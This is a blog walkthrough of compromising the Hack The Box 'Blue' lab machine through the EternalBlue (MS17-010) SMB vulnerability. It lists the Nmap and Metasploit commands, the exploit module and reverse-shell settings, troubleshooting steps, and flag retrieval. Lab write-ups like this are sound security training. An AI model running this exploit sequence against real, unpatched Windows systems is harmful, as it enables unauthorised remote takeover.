I’ve just completed a walkthrough of the “Blue” machine on Hack The Box, which marks the end of the beginner track for me! If you’re following along, I’ve got the “Lame” machine walkthrough linked on my channel, so you can finish the whole track too.

Machine Name : HackTheBox Blue

Difficulty: Easy

Demonstrated Concept: Exploiting Windows through Eternal Blue Vulnerability.

My Approach to the “Blue” Machine

1. Initial Reconnaissance (Nmap Scan)

I kicked things off with an Nmap scan to scout for open ports and services on the target machine.

  • Command Used: nmap -sV -sC [IP_ADDRESS]

The scan immediately highlighted several open ports, many of which were related to SMB (Server Message Block), specifically ports 135, 139, and 445. The Nmap results were quite telling: SMBv1 was enabled, and the target was running Windows 7 Professional Service Pack 1. This combination screamed “EternalBlue vulnerability” to me!

2. Enumerating SMB with Metasploit 🔍

Even if I hadn’t known about EternalBlue, the logical next step after the Nmap scan would be to dig deeper into SMB. So, I fired up Metasploit.

I started by searching for SMB-related auxiliary modules:

  • Command Used: search name:smb type:auxiliary

I found a module that could check for the MS17-010 vulnerability (which EternalBlue exploits).

  • Module Used: auxiliary/admin/smb/ms17_010_command
  • Commands Used:
    • use auxiliary/admin/smb/ms17_010_command
    • info
    • show options
    • set rhosts [IP_ADDRESS]
    • run

This initial check indicated that MS17-010 was likely exploitable. To confirm, I then used a more specific scanner module:

  • Module Used: auxiliary/scanner/smb/smb_ms17_010
  • Commands Used:
    • use auxiliary/scanner/smb/smb_ms17_010
    • info
    • show options
    • set rhosts [IP_ADDRESS]
    • run

The output clearly confirmed: “Host is likely vulnerable to MS17-010.”

3. Exploiting with EternalBlue in Metasploit

With the vulnerability confirmed, it was time for the exploit. I searched for an exploit module:

  • Command Used: search type:exploit name:smb

Then, I selected the EternalBlue exploit module:

  • Module Used: exploit/windows/smb/ms17_010_eternalblue
  • Commands Used:
    • use exploit/windows/smb/ms17_010_eternalblue
    • show options
    • set rhosts [IP_ADDRESS]

I also needed to set my local host IP for the reverse shell:

  • Command Used to Check My IP: ip a
  • Command Used to Set Local Host: set lhost [MY_IP_ADDRESS]
  • Command Used to Run Exploit: exploit

4. Troubleshooting the Exploit 🐛

The exploit didn’t work immediately. It connected and triggered the vulnerability but failed to establish a Meterpreter session, showing errors about “triggering free of corrupted buffer.” Even after Metasploit tried increasing “groom allocations,” it still failed.

I double-checked if the target machine was still online:

  • Command Used: ping [IP_ADDRESS] (It was responsive).

Reviewing the module options, I realized I hadn’t explicitly set the target operating system.

  • Command Used to Show Targets: show targets
  • Command Used to Set Target: set target 1 (Target 1 was Windows 7).
  • Command Used to Confirm Options: show options
  • Command Used to Rerun Exploit: run

Even with the target set, the exploit continued to fail. The issue seemed to be “sending egg to corrupted connection.” My final troubleshooting step was to reset the target machine on Hack The Box.

5. Successful Exploitation and Post-Exploitation 🎉

After resetting the machine, I ran the exploit again (with lhost, rhosts, and target 1 all set).

  • Command Used: exploit

This time, success! I got a Meterpreter session. From there, I dropped into a command shell:

  • Command Used: shell

Finally, I navigated to find the user and root flags:

  • Commands Used:
    • dir
    • cd Users
    • dir (This showed “Administrator” and “harris” user directories)
    • cd harris
    • type user.txt (To retrieve the user flag)

I knew the root flag would be in the Administrator’s directory, which I had already captured in a previous attempt.

And that’s how I compromised the “Blue” machine using the EternalBlue exploit! This officially wraps up the beginner track on Hack The Box for me, although I still need to submit one flag for “Lame” to hit 100% completion. I’m excited to see which track I’ll dive into next!

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles